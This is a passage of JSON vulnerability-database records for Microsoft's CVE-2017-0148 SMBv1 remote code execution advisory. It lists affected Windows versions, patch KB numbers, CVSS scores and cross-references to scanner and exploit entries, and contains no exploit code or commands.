Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T02:51:36", "differentElements": ["msAffectedSoftware"], "edition": 49}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T04:46:25", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3210721", "KB4012214", "KB3205401", "KB3210720", "KB4012212", "KB4012213", "KB4013198", "KB4012216", "KB3212646", "KB4012598", "KB4012215", "KB3177186", "KB4012606", "KB3213986", "KB3205409", "KB4013429", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T04:46:25", "differentElements": ["msAffectedSoftware"], "edition": 50}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T10:52:46", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4013198", "KB4012598", "KB4012606", "KB3210720", "KB3210721", "KB4012214", "KB3177186", "KB3212646", "KB4012216", "KB4012215", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB3205401", "KB4013429", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": 